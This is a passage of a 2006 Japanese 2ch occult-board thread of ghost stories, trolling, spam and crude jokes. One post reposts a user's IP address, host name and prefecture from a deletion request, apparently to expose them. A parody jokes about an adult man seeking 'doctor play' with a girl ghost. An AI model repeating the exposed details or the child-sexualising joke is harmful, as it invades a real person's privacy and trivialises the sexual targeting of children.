867 :本当にあった怖い名無し:2006/10/14(土) 09:32:32 ID:0Fa5UvGZ0
まあその女子高生の自業自得って感じもするかな。
自ら要らぬトラブルを招いたって点で。

868 :本当にあった怖い名無し:2006/10/14(土) 10:25:24 ID:WBg2j7ZI0
コワイ話ししてチョーダイ!

869 :本当にあった怖い名無し:2006/10/14(土) 10:29:29 ID:WBg2j7ZI0
オキロ〜!オキロ〜!アノコヲトキハナテ〜

870 :もこ:2006/10/14(土) 10:32:51 ID:5z7X3Mf3O
もこだよ〜

871 :Deoxyribonucleic Acid:2006/10/14(土) 10:34:13 ID:aF3KYSfiO
もこちゃん可愛い☆
もこちゃんが娘だったら何でも為てあげちゃう☆

872 :本当にあった怖い名無し:2006/10/14(土) 10:36:18 ID:WBg2j7ZI0
バルスw

873 :本当にあった怖い名無し:2006/10/14(土) 11:13:40 ID:lSE7lcLi0
コワイ話ししてチョーダイ!

874 :本当にあった怖い名無し:2006/10/14(土) 11:14:48 ID:/WkLfr6J0
私が学生の頃の話でもいい?

875 :本当にあった怖い名無し:2006/10/14(土) 11:35:40 ID:X9GPCT3/O
久々戻って来たらオカ板荒れてるなぁ…

876 :本当にあった怖い名無し:2006/10/14(土) 12:07:35 ID:my85y1nTO
>>875
嵐は去れ
(`・ω・′)

877 :本当にあった怖い名無し:2006/10/14(土) 12:12:37 ID:/WkLfr6J0
>>876
あらしはお前だニャ!
もうほんっと頭来るんだからプンプン!

878 :本当にあった怖い名無し:2006/10/14(土) 12:14:41 ID:1cDRFboL0
>>874
いいよ

879 :本当にあった怖い名無し:2006/10/14(土) 12:23:38 ID:my85y1nTO
>>877

華麗な一人二役乙。

いつも自作自演の嵐活動ご苦労様です。
(´・ω・`)ノ

そろそろ自作THE ENDしていただけないでしょうか?

880 :本当にあった怖い名無し:2006/10/14(土) 12:39:52 ID:i0+lkAgAO
あれはなんだ!!

881 :本当にあった怖い名無し:2006/10/14(土) 13:21:10 ID:UtThE9K00
姉は血を吐く、妹は火吐く、可愛いトミノは宝玉(たま)を吐く。
ひとり地獄に落ちゆくトミノ、地獄くらやみ花も無き。
鞭で叩くはトミノの姉か、鞭の朱総(しゅぶさ)が気にかかる。
叩けや叩けやれ叩かずとても、無間地獄はひとつみち。
暗い地獄へ案内をたのむ、金の羊に、鶯に。
皮の嚢(ふくろ)にゃいくらほど入れよ、無間地獄の旅支度。
春が来て候(そろ)林に谿(たに)に、くらい地獄谷七曲り。
籠にや鶯、車にゃ羊、可愛いトミノの眼にや涙。
啼けよ、鶯、林の雨に妹恋しと声かぎり。
啼けば反響(こだま)が地獄にひびき、狐牡丹の花がさく。
地獄七山七谿めぐる、可愛いトミノのひとり旅。
地獄ござらばもて来てたもれ、針の御山の留針(とめばり)を。
赤い留針だてにはささぬ、可愛いトミノのめじるしに。

これ何?呪いの文章か?

882 :本当にあった怖い名無し:2006/10/14(土) 13:47:36 ID:i0+lkAgAO
>>881
キンタマ縮むを忘れないで

883 :本当にあった怖い名無し:2006/10/14(土) 14:19:00 ID:d0I8JoXJ0
昼間にしか怖くてサイト開けないチキンな私が投下してみる。
特に幽霊だのが出てくる話ではないので
興味のない人はスルーで&スレ違だったらスマソ。
ちなみに実体験であり、自分の名前は「ゆか[仮名]」で進めていきます。


まだ私が消防だった頃。当時4年生だった私は、
猩紅熱という今ではあまり聞かないような病気をやらかした。
本来この病気自体深刻ではないらしいのだけども、
私の場合数日たっても熱がさがらず急性腎炎まで起こし、
一ヶ月以上入院した挙句、2週間の自宅絶対安静という
消防で遊びたい盛りの自分には酷な宣告をされてしまった。
しかし やたらと血尿出したりなんたりと、
間違っても遊びに行きたいなんて思える状態ではなかったが・・・

884 :本当にあった怖い名無し:2006/10/14(土) 14:19:39 ID:d0I8JoXJ0
>>883 続き

で、実家は農家で父子家庭。
父はタクシー運転手でほとんど家に居る事はなく、
祖父と祖母も夕方の5時まできっかり家にいないので、
ひたすら何もないだだっぴろい家で一人ゴロゴロしていた。

する事もなく、ふと居間にある掛け時計を見ると
針が変。というか、なんか止まってるような、
進んでないというか、不思議な感覚。
当時は熱もあったし幻覚だったのかもしれないけど、
厳密にいうと「逆に時間が巻き戻ってる」感じ。
秒針が普通にカチカチちゃんと動いてるけど1分ずつ戻ってる。
不思議と怖いなんて感情はかけらもなく、
逆にずーっと見ていると気持いい感覚・・・ふわふわとした。
そんな感じになってきて、14時25分から巻き戻る掛け時計をずっと見てた。

885 :本当にあった怖い名無し:2006/10/14(土) 14:20:48 ID:d0I8JoXJ0
>>884 続き

その時、突然 大勢の子供の声で
「ゆーかーちゃーん!」と声がして我に返った。

うれしい事に、学年(当時過疎学校だったので6年間クラス等なかった)
の全員が我が家にお見舞いに来てくれたのだ。
先生引率の元、当時小学校から徒歩3分だった我が家へ(笑)
玄関のすりガラス越しに皆の姿が見えて嬉しくてニコニコしながら迎えた。
ただ、自分の病気は感染病である為、完全防備での久々の対面だったが、
なにやら手紙を書いてきてくれており、皆一生懸命読んでくれた。
その内容も事細かに覚えている。早く元気になってねとかそんな内容。
普段はあまり仲良くなかった男の子達も照れくさそうに千羽鶴をほら、とくれたり、
先生が持ってきてくれた給食プリン等がとにかく嬉しくて、
22歳になった今でもそのときの光景は鮮明に記憶している。

・・・が、先日同窓会があり、もちろん私はその話しをしたところ、
同級生21人(自分除く)全員が「そんなお見舞いになんて行っていない」
というのです。もちろん先生にも確認をとりましたが覚えてないなぁ、との事。

886 :本当にあった怖い名無し:2006/10/14(土) 14:23:59 ID:d0I8JoXJ0
>>885続き

ちょっ、自分頭わいてんのかな?とガクブルしてたところ、
たまたま会場のホテルでバイトしてた1学年下の後輩がその話を聞き、
「え、お前らいってたじゃん(笑)小4の頃だろ?」
と、何故か彼は覚えている模様。彼いわく、
子供心に「お見舞いとはいえ先生公認で授業さぼれていいな〜」
なんて思いながら我が家に向かう一行を見ていたとの事。

その一言で軽く会場がパニックになる騒動に。
必死で全員が思い出そうと家族へ電話したり、
後輩に電話したりと場の空気がおかしなことになってきた。
全員の家族も「ああそんな事あったねぇ」と確かに記憶にあるのだ。
なのに、当の本人達にはまったく記憶が無い。
まぁしてもらった側、してやった側で多少の気持の重みの違いがあれど、
22人全員が「記憶からその部分が抜けてる」事が気味悪くなり、
なんとなく後味が悪いままその日の同窓会はお開き。

887 :本当にあった怖い名無し:2006/10/14(土) 14:24:41 ID:d0I8JoXJ0
>>886 続き

結局 久々に連絡をとりあうようになった今でも
やはり皆その当時の事はまったく思い出せないというか、
そもそもそんな事あったのか?と言うほどにキレイに記憶が無い。

文章にしていくと自分の文才の無さでまったく恐怖感は出ていないけど、
正直今でもかなりガクブル。
オチらしいオチもないけど自分が経験した意味不明な恐怖体験。
以降同級生が自分を見る目がややカワイソウな感じなのは秘密。

888 :本当にあった怖い名無し:2006/10/14(土) 14:42:12 ID:uEzf813PO
gj
不思議な話だ…
糞ダメみてぇなスレの中にもちゃんと書いてくれる人がいるんですね

889 :本当にあった怖い名無し:2006/10/14(土) 14:44:18 ID:i0+lkAgAO
マツナガって嘘かと思ったら本馬にあるのな、正直吉牛の方が美味い…

890 :本当にあった怖い名無し:2006/10/14(土) 14:45:25 ID:i0+lkAgAO
>>888
お前アイカゴだろ?

891 :本当にあった怖い名無し:2006/10/14(土) 14:46:16 ID:i0+lkAgAO
すまんageてしまった…

892 :本当にあった怖い名無し:2006/10/14(土) 14:47:19 ID:i0+lkAgAO
すまんまたageてしまった…

893 :本当にあった怖い名無し:2006/10/14(土) 14:48:15 ID:i0+lkAgAO
すまんまたまたageてしまった

894 :本当にあった怖い名無し:2006/10/14(土) 14:49:29 ID:i0+lkAgAO
すまんまたまたまたageてしまった

895 :本当にあった怖い名無し:2006/10/14(土) 14:50:54 ID:i0+lkAgAO
すまんまたまたまたまたageてしまった。
略して素股。

896 :本当にあった怖い名無し:2006/10/14(土) 15:04:50 ID:/WkLfr6J0
>>895
ちょwwwwアイちゃんひとりでスレ消費しすぎwwwwwwwwwwwwwwwww


897 :本当にあった怖い名無し:2006/10/14(土) 15:11:13 ID:i0+lkAgAO
劇団チロルチョモ

898 :本当にあった怖い名無し:2006/10/14(土) 15:47:41 ID:/WkLfr6J0



899 :本当にあった怖い名無し:2006/10/14(土) 15:48:21 ID:/WkLfr6J0



900 :本当にあった怖い名無し:2006/10/14(土) 15:50:41 ID:/WkLfr6J0



901 :本当にあった怖い名無し:2006/10/14(土) 15:58:07 ID:XqMDDUMyO
しっ!誰かウンコする…

902 :本当にあった怖い名無し:2006/10/14(土) 15:58:55 ID:/WkLfr6J0



903 :もこ:2006/10/14(土) 16:00:16 ID:k9OtEViDO
こんにちわぁ

もこだよ

電波お話畑板の人たちっていい人だね

904 :本当にあった怖い名無し:2006/10/14(土) 16:00:20 ID:/WkLfr6J0



905 :本当にあった怖い名無し:2006/10/14(土) 16:02:07 ID:XqMDDUMyO
しっ!誰か下痢をした…

906 :本当にあった怖い名無し:2006/10/14(土) 16:02:50 ID:/WkLfr6J0



907 :本当にあった怖い名無し:2006/10/14(土) 16:03:35 ID:/WkLfr6J0



908 :本当にあった怖い名無し:2006/10/14(土) 16:08:10 ID:/WkLfr6J0



909 :本当にあった怖い名無し:2006/10/14(土) 16:08:49 ID:i0+lkAgAO
しっ!2つ食う…

910 :本当にあった怖い名無し:2006/10/14(土) 16:19:28 ID:XqMDDUMyO
これ内緒の話だけど最初にあざーす!て言葉広めたの俺だよ。

911 :もこ:2006/10/14(土) 16:22:18 ID:eQJK57Wb0
もこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこ
もこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこ
もこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこ
もこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこ
もこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこ
もこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこ
もこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこ
もこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこ

912 :本当にあった怖い名無し:2006/10/14(土) 16:24:40 ID:mdwRgNhm0
あっ、もこだ!


913 :本当にあった怖い名無し:2006/10/14(土) 16:25:53 ID:4Za4I3fV0
ある小学校のトイレには「トイレの花子さん」が出るそうだ。
三階の女子トイレの三番目のドアを三回ノックして、
「はーなこさん、遊びましょう」
と言うと、
「はーい」
という返事が返ってくる。その後、
「何して遊ぶ?」
と聞かれ、
「首絞めごっこ」
というと、首を絞められ殺されてしまう。

その日も三階の女子トイレからノックの音がしていた。
「はーなこさん、遊びましょ」
すると、
「はーい」
誰もいないはずの個室から返事が返って来た。やはり噂は本当だったのだ。
個室の中の少女の声はこう続けた。
「何して遊ぶ?」
それに答えて、ノックをした者はこう言った。
「お医者さんごっこ」
「…え?」
中からの声には、明らかに動揺による震えが混ざっていた。そしてドアがゆっくりと開く。
「ひっ!」
個室の中の少女、即ち「トイレの花子さん」は、この時初めて成仏したい衝動に駆られた。

花子さんの目の前に立っていたのは成人の男だった。
アニメの美少女キャラクターの絵がプリントされたTシャツ、
薄くて高価な本を蓄えた両手の紙袋、脂の浮き出た両の頬に、伸びきった髪の毛。
男は薄笑いを浮かべながら、こう言った。

「さあ、お医者さんごっこしようよ」

914 :本当にあった怖い名無し:2006/10/14(土) 16:38:04 ID:B5QiIM2XO
うぬら…



セックス

915 :本当にあった怖い名無し:2006/10/14(土) 16:43:24 ID:XqMDDUMyO
>>913
吹いたwww

アニオタにとっては花子さんも萌え対象になるんだろうな。

916 :多村の棍棒:2006/10/14(土) 16:46:51 ID:i0+lkAgAO
昨日起こった事をはなしゅ。
オラには多村というライバルがいる。多村は確かにつおい。
だが俺の方がつおい。
ある日、また多村から果たし状がきた。またか〜と思いちゅちゅも、戦闘民族サイヤ人の僕は血わき肉踊った…!!
そしてその日の2日後、オリはミラクル「フルーツ」を食べた…
本当にこれを食べるとレモンがとても甘くなるやろな!!というのも、家には誰かが庭に置いていったレモンが1500個ある。ミラクルフルーツは高い…が1500買った。結構な値段だ、家には金はもうない。レモンで暮らしていこう…そう心にきめた!
でミラクルフルーツを食ってみた…むぐむぐ…ぺっ……まず……ミラクルフルーツは俺の口にはあわないようだ。
俺はレモンを食うのを忘れているのに気付かなかった。何故ならミラクルフルーツが不味すぎて切れてしまったのだ。
でも食わなくて正解だった。そう、そのレモンは多村が置いていったレモン型爆弾だったのだ…。
次の日、多村は棍棒を買いにホームセンターに買いに行く夢をみた…。

917 :新〇結衣:2006/10/14(土) 17:02:56 ID:i0+lkAgAO
3歳まで自分の事を男だと思ってたらそのとおりでしたよ。
新〇結衣です。
まぁ〜最近のオッチャンらは態度が悪いね!
ビックリしましたよ。というのもね、私お腹がすいて、ファーストキッチ〇コにいったんだよ。な?
そしたらな、俺のうらにならんでた糞おやじがよ、早くしてくんないかな、ってつぶやいてやがんのよ!俺が親切にわざと通せんぼしてたのになに言ってやがんだこの低能糞ジジーがって切れたわけよ。
取りあえずここで戦闘はまずいってことで、国技館に行ったの!でグローブはめてカーン!!!、いざ戦ってまたら超つええ…つえーつえー、で結局俺が勝ってその爺とは戦友、あっライバルのことな。
で仲良くファーストキッチ〇コに行ったのさ〜。でもそれがきっかけで爺から毎日メールがきてうぜーうぜー。
そいつの名前?もちろん多村だよ。

918 :本当にあった怖い名無し:2006/10/14(土) 17:16:18 ID:lybamCf80
チンポ

919 :本当にあった怖い名無し:2006/10/14(土) 17:28:55 ID:i0+lkAgAO
クロスゼウスって結局ゼウスなの?偽物なの?アニメ見てないからまからへん〜

920 :本当にあった怖い名無し:2006/10/14(土) 17:39:51 ID:i0+lkAgAO
みんな…いないの…よ〜しその間に…

921 :本当にあった怖い名無し:2006/10/14(土) 17:43:27 ID:i0+lkAgAO
たくあん食〜べよっと、ポリポリ〜ポリポリ〜ポリポリポリポリ〜はい!ポリポリ〜ポリポリ〜ポリポリポリポリ〜はい!

922 :本当にあった怖い名無し:2006/10/14(土) 18:10:41 ID:/WkLfr6J0



923 :本当にあった怖い名無し:2006/10/14(土) 18:14:05 ID:/WkLfr6J0



924 :本当にあった怖い名無し:2006/10/14(土) 18:24:01 ID:i0+lkAgAO
>>923
荒らしならやめてください(>ω<)

925 :本当にあった怖い名無し:2006/10/14(土) 18:25:35 ID:/WkLfr6J0
むかし激アイカゴっていなかった?

926 :本当にあった怖い名無し:2006/10/14(土) 18:25:50 ID:i0+lkAgAO
\(>ω<)/てぃっ!

927 :本当にあった怖い名無し:2006/10/14(土) 18:26:19 ID:/WkLfr6J0
>>926


928 :本当にあった怖い名無し:2006/10/14(土) 18:27:11 ID:i0+lkAgAO
>>925
さげろや!
はにゃはにゃぐ〜(ω)

929 :本当にあった怖い名無し:2006/10/14(土) 18:28:34 ID:/WkLfr6J0
>>928
どいした?
もらしたのか?

930 :本当にあった怖い名無し:2006/10/14(土) 18:29:27 ID:/WkLfr6J0
>>928
ごめんおっちゃんさげることをしらなかったよ
うふふ

931 :本当にあった怖い名無し:2006/10/14(土) 18:34:09 ID:/WkLfr6J0



932 :本当にあった怖い名無し:2006/10/14(土) 18:37:48 ID:uqwSSvgr0
いぬ

933 :本当にあった怖い名無し:2006/10/14(土) 18:39:30 ID:i0+lkAgAO
>>930
俺のrararaのパクリすんな!

934 :本当にあった怖い名無し:2006/10/14(土) 18:41:16 ID:/WkLfr6J0
>>933
は?なんやわれ?いてまうぞコラ!
コラ〜!プンプン!

935 :本当にあった怖い名無し:2006/10/14(土) 18:42:40 ID:/WkLfr6J0
さあもうすぐ1000だね
はやいとこ埋めちゃおうぜ!!

936 :本当にあった怖い名無し:2006/10/14(土) 18:44:38 ID:/WkLfr6J0
わざわざ通報してくれてるひまな住人さんにも悪いし
゙;`(;゚;ж;゚; )ブフォ


937 :本当にあった怖い名無し:2006/10/14(土) 18:45:18 ID:/WkLfr6J0
;`;:゛;`(;゚;ж;゚; )ブフォ

938 :本当にあった怖い名無し:2006/10/14(土) 18:58:47 ID:/WkLfr6J0



939 :本当にあった怖い名無し:2006/10/14(土) 19:02:32 ID:/WkLfr6J0



940 :本当にあった怖い名無し:2006/10/14(土) 19:07:07 ID:/WkLfr6J0
>>916-917
今読み直すとめちゃくちゃ怖い

941 :本当にあった怖い名無し:2006/10/14(土) 19:08:00 ID:/WkLfr6J0
呪い殺す

942 :本当にあった怖い名無し:2006/10/14(土) 19:10:46 ID:/WkLfr6J0
   か
  しりとり
   ん
ラテとカ
   う


943 :アイカゴ:2006/10/14(土) 19:14:13 ID:i0+lkAgAO
は〜…低能糞野郎が住み着いたもんだぜ…

944 :激アイカゴ:2006/10/14(土) 19:17:33 ID:/WkLfr6J0
>>943
ほんとだね。なんとかならんかね。
sageもしらないみたいだし。

945 :本当にあった怖い名無し:2006/10/14(土) 19:33:48 ID:/WkLfr6J0



946 :本当にあった怖い名無し:2006/10/14(土) 19:34:37 ID:fn7r21Uc0
コワイ話ししてチョーダイ!ハニャハニャグ〜(ω)

947 :本当にあった怖い名無し:2006/10/14(土) 19:38:12 ID:XqMDDUMyO
しっ!誰か飯を食う…

948 :本当にあった怖い名無し:2006/10/14(土) 19:47:33 ID:/WkLfr6J0
お前ら俺が唯一生きる楽しみのこのスレを荒らしやがって・・・
一人残らず呪ってやる。


949 :本当にあった怖い名無し:2006/10/14(土) 19:51:24 ID:i0+lkAgAO
しっ!…パイオツ……
ぶひゃひゃひゃひゃはゃひゃひゃひゃーは……ちゅまんこ(´・ω・`)

950 :本当にあった怖い名無し:2006/10/14(土) 19:58:50 ID:/WkLfr6J0
>>949
あと50レスなんだからまじめにやろうぜ

951 :本当にあった怖い名無し:2006/10/14(土) 20:10:21 ID:i0+lkAgAO
>>950
ちゅまんこ…
ぶひゃひゃひゃひゃひゃ紗和ちゃん好きひゃひゃひゃひゃひゃひゃ

952 :本当にあった怖い名無し:2006/10/14(土) 20:41:45 ID:GrDZNbRSO
次スレを早めに立てた方が良いのでは?

953 :本当にあった怖い名無し:2006/10/14(土) 20:46:24 ID:/me1K2LW0
>>952
本当にいらないだろ!

954 :本当にあった怖い名無し:2006/10/14(土) 20:50:55 ID:/WkLfr6J0
>>952
立てるか?

955 :キック長渕:2006/10/14(土) 20:52:55 ID:i0+lkAgAO
>>952
お前がーたてるぉー!
よーそろー

956 :本当にあった怖い名無し:2006/10/14(土) 20:55:01 ID:BoOA7PjJ0
立てたよ

http://hobby7.2ch.net/test/read.cgi/occult/1160826850/

957 :本当にあった怖い名無し:2006/10/14(土) 20:55:26 ID:oOtytHAi0
新スレ・・・もう必要ないかな

958 :本当にあった怖い名無し:2006/10/14(土) 20:57:12 ID:BoOA7PjJ0
NG推奨ID

i0+lkAgAO
/WkLfr6J0

959 :本当にあった怖い名無し:2006/10/14(土) 21:14:21 ID:XqMDDUMyO
しっ!ゴチソウサマ…

960 :本当にあった怖い名無し:2006/10/15(日) 00:58:07 ID:cRPFInAy0
アラシのマエのシズケサ〜。

961 :本当にあった怖い名無し:2006/10/15(日) 00:58:50 ID:JakFBAFh0
なぜ台風のメの中にいると考えられないっ!!

962 :本当にあった怖い名無し:2006/10/15(日) 00:59:21 ID:cRPFInAy0
チチンプイプイッ♪チチンプイプイッ♪

963 :本当にあった怖い名無し:2006/10/15(日) 04:57:50 ID:jh4QTsGGO
中途半端やね〜梅ちゃいな〜あ〜梅ちゃいな〜ね〜

964 :本当にあった怖い名無し:2006/10/15(日) 06:22:42 ID:9O2Vth8R0
これは俺が高校生の時の話
ある日1人で商店街を歩いていると小さなビデオショップがあった
100円のビデオがあったので暇つぶしに1個買ってみた
家に帰ってみると俺の地元の町がいっぱい映っていて見ていくうちに
だんだんと俺の家に近づいてくる。そして俺の家が映ったその時
「ギコギコギコギコギコ」と音がする俺の家は2階建ての家なので
2階から玄関がある下を覗いて見た。そしたらノコギリを持ってる男が俺の家を
斬ってるではないか・・・やめてくれ〜俺は叫んだしかしその男はやめてくれない
絶望の中俺はどうしてこんなことになってしまったんだと思い考えた
あっ!!100円のビデオを止めればいいんだと思い100円のビデオを止めるとその男は消えた
それっきり怖くて100円のビデオはつけていない

965 :本当にあった怖い名無し:2006/10/15(日) 06:43:02 ID:TssYyfxNO
>>964小学生が読む怪談話にまったく同じ話が載ってたぞ。つまんねーから消えろや

966 :本当にあった怖い名無し:2006/10/15(日) 07:05:27 ID:6/DCVtsK0
クロロ

967 :本当にあった怖い名無し:2006/10/15(日) 09:36:45 ID:3+3/BzuYO
仲間苦手ダメ途中なのでも予定通りに
タピオンガリガリ魔人って?
放ったらと一緒よ!

野郎ドラゴンの会議室にならない?
至急連絡待ちで見ろよ。

968 :本当にあった怖い名無し:2006/10/15(日) 10:06:59 ID:f2hepP3o0
457 住人 2006/10/15(日) 04:10:05 HOST:61-208-219-85.fgo.jp
削除対象アドレス:

http://hobby7.2ch.net/test/read.cgi/occult/1160042683/931
http://hobby7.2ch.net/test/read.cgi/occult/1160042683/933-945
http://hobby7.2ch.net/test/read.cgi/occult/1160042683/948-951
http://hobby7.2ch.net/test/read.cgi/occult/1160042683/954-955

削除理由・詳細・その他:

4.投稿目的による削除対象
(議論を妨げる煽り。第三者を不快にする暴言)
5.掲示板・スレッドの趣旨とは違う投稿
(故意にスレッドの運営・成長を妨害)

長い期間荒し行為が継続されています。
お手数ですが対処のほど宜しくお願い致します。

IPアドレス 61.208.219.85
ホスト名 61-208-219-85.fgo.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 山梨県
市外局番 0555
接続回線 CATV

969 :本当にあった怖い名無し:2006/10/15(日) 10:38:14 ID:4CcSfOAdO
下らない書込をするだけあって、ヤマ無し県人か。

970 :本当にあった怖い名無し:2006/10/15(日) 13:35:22 ID:s/UVdEgg0
産メロ〜産メロ〜!コワイ話ししてチョーダイ!

971 :本当にあった怖い名無し:2006/10/15(日) 13:36:45 ID:s/UVdEgg0
雨メロ〜雨メロ〜!コワイ話ししてチョーダイ!

972 :本当にあった怖い名無し:2006/10/15(日) 13:37:36 ID:s/UVdEgg0
ふにゃふにゃぐ〜(ω)

973 :もこ:2006/10/15(日) 13:41:08 ID:DYmOa5kr0
もこだよー

怖い話、乃至は怖い伝説の話しちゃうよんちゃんねる。

974 :もこ:2006/10/15(日) 13:47:02 ID:DYmOa5kr0
ダダメならダメって言ってよね!

975 :本当にあった怖い名無し:2006/10/15(日) 16:26:46 ID:jh4QTsGGO
すっぱい思いをした…

976 :本当にあった怖い名無し:2006/10/15(日) 17:50:18 ID:Ll7wkIYX0
∩゚∀゚∩age

977 :テリー:2006/10/15(日) 17:59:46 ID:BMWIWoqN0
なし

978 :本当にあった怖い名無し:2006/10/15(日) 18:04:12 ID:4TJpO+lvO
>>977
IDがカッコよす

979 :本当にあった怖い名無し:2006/10/15(日) 18:04:25 ID:jh4QTsGGO
>>977
BMWだね…
ってかこのスレ、荒らし(山梨)のせいで寂れたな…

980 :本当にあった怖い名無し:2006/10/15(日) 18:29:55 ID:II0e/LdE0
荒らしって山梨だったの?

981 :本当にあった怖い名無し:2006/10/15(日) 18:36:20 ID:jh4QTsGGO
>>980
>>968

982 :本当にあった怖い名無し:2006/10/15(日) 18:43:29 ID:xvfEQkpg0
>>981
違うだろw
山梨は削除依頼をしてる奴だぞ

983 :本当にあった怖い名無し:2006/10/15(日) 18:47:30 ID:jh4QTsGGO
>>982
え、そうなの?>>969の言ってることを鵜呑みにしてしまった…orz

984 :本当にあった怖い名無し:2006/10/15(日) 19:31:21 ID:II0e/LdE0
ほっときゃいいのに
削除以来なんかするからムキになってあらしてんじゃないの?

985 :本当にあった怖い名無し:2006/10/15(日) 19:36:43 ID:jh4QTsGGO
>>984
俺も思います。スルーしてれば、勝手に消えていくのに…。

986 :本当にあった怖い名無し:2006/10/15(日) 21:00:04 ID:jh4QTsGGO
新スレに凄い勢いで書いてくれているかたがいますね。
嬉しいんですけど、ここが中途半端なんでまずはこちらに書いて欲しいです。

987 :本当にあった怖い名無し:2006/10/15(日) 21:53:05 ID:zpmVyC+A0
少なくともこっちには書きたくないだろ、常識的に

988 :本当にあった怖い名無し:2006/10/15(日) 23:25:54 ID:f2hepP3o0
458 住人 2006/10/15(日) 10:29:34 HOST:61-208-219-85.fgo.jp
削除対象アドレス:

http://hobby7.2ch.net/test/read.cgi/occult/1160042683/968

削除理由・詳細・その他:

5.掲示板・スレッドの趣旨とは違う投稿
(故意にスレッドの運営・成長を妨害)

長い期間荒し行為が継続されています。
荒しが削除依頼を嫌がり、このスレをコピペして
尚且つ個人情報を晒しています。
お手数ですが対処のほど宜しくお願い致します

989 :本当にあった怖い名無し:2006/10/16(月) 00:39:04 ID:aCsMxUaO0
ハヨ産メロ!ヤレ産メロ!

990 :本当にあった怖い名無し:2006/10/16(月) 00:41:27 ID:aCsMxUaO0
はにゃはにゃぐ〜(ω) 

991 :本当にあった怖い名無し:2006/10/16(月) 00:55:04 ID:edFPxH6k0
    _  ∩
  ( ゚∀゚)彡  ウメロ!ウメロ!
  (  ⊂彡
   |   |
   し ⌒J


992 :本当にあった怖い名無し:2006/10/16(月) 01:13:17 ID:YGWWoy9P0
うめ!

993 :本当にあった怖い名無し:2006/10/16(月) 01:23:16 ID:PALSjLv0O


994 :本当にあった怖い名無し:2006/10/16(月) 01:24:22 ID:PALSjLv0O


995 :本当にあった怖い名無し:2006/10/16(月) 01:36:52 ID:2LVkQ3W70


996 :本当にあった怖い名無し:2006/10/16(月) 01:37:29 ID:LbxobnUe0


997 :本当にあった怖い名無し:2006/10/16(月) 01:37:38 ID:2LVkQ3W70


998 :本当にあった怖い名無し:2006/10/16(月) 01:38:34 ID:LbxobnUe0


999 :本当にあった怖い名無し:2006/10/16(月) 01:38:54 ID:+1JmsmI40
1000ちゃぶだいね

1000 :本当にあった怖い名無し:2006/10/16(月) 01:39:18 ID:LbxobnUe0
楳図かずお先生は神!

1001 :1001:Over 1000 Thread
                      γ
                      (
                      _ノ

                   /
                __
             ,、'"   .  `' 、
             i`ー  _    ',
.             l| !|      i""!|
                 }: }i    |{  !j
               〈| 'J |!   }j  :}
            _ノ;し  i}  {J  |
         ,、-,、'         ハ- 、
         ( .( '、_    _ ,ノ  ノ:i   )
        ,、'""`ー---‐'"フ、_ - _,、' -'"
        (  _   ,、'"    ̄
         `ー--─'"
千本目の蝋燭が消えますた・・・
新しい蝋燭を立ててくださいです・・・

287 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)